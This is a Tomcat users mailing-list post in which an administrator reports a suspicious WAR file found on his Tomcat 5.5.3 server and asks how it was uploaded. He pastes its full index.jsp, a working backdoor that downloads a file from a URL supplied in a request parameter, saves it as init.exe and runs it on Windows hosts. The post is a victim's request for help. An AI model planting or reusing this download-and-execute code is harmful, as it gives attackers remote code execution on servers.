Possible virus uploaded to Tomcat 5.5.3

[Warren Bell]

I have found a war file on my server that appeared around July 14. I am 
the only one that has access to this machine and I did not put it there. 
It consists of a jsp that downloads a program named init.exe and then 
executes it. This server is on a private network. Though there are three 
pc kiosks in grocery stores that are available to the public that access 
this server but they are on a different subnet and only have access to 
the server thru port 8080. I am pretty sure it came from one of these 
stores. The url used for this program is .../fexcep/index.jsp?url=... I 
am running Tomcat 5.5.3 on Windows XP.

How did somebody get this war file onto my server ?
Here is the code of index.jsp:

<%@ page language="java" pageEncoding="utf-8" 
import="java.io.*,java.net.*,java.security.*,javax.crypto.*"%>
<%!
   String sys=null;
      
public class AutoKill {
  
   private boolean downFile(String url,String filesrc)
   {
       try
       {
       URL urlc = new URL(url);
       HttpURLConnection con = (HttpURLConnection)urlc.openConnection();
       con.connect();
       byte[] b=new byte[1024];
       BufferedInputStream bis=new 
BufferedInputStream(con.getInputStream());
       FileOutputStream fos=new FileOutputStream(filesrc);
       int length=-1;
       while((length=bis.read(b,0,b.length))!=-1)
       {
           fos.write(b,0,length);
       }
       fos.close();
       bis.close();
       return true;
       }catch(Exception e)
       {
       e.printStackTrace();   
       }
       return false;
   }
}

%>
<%
       sys=System.getProperty("os.name");
       int i=sys.indexOf("Windows");
       AutoKill ak=new AutoKill();
       if(i>-1)
       {
           String result;
           try
           {
               String url=request.getParameter("userurl");
               System.out.println(url);
               String 
filesrc=request.getSession().getServletContext().getRealPath("")+"/init.exe";
               if (ak.downFile(url,filesrc) )
               {
                   Process run_proc=Runtime.getRuntime().exec(filesrc);
                   result="Success! ";
               }
               else
               {
                   result="Failure! Down File Failure!";
               }

           }catch(Exception e)
           {
               result="Failure!throws Exception - "+e.getMessage()+"! ";
           }
           request.setAttribute("result",result);
       }
       else
       {
           request.setAttribute("result","Failure!Because Remote 
computer system is "+sys+"!");
       }
              
       request.getRequestDispatcher("/ok.jsp").forward(request, response);
%>





--
Thanks,

Warren Bell
909-645-8864
[EMAIL PROTECTED]


---------------------------------------------------------------------
To start a new topic, e-mail: users@tomcat.apache.org
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]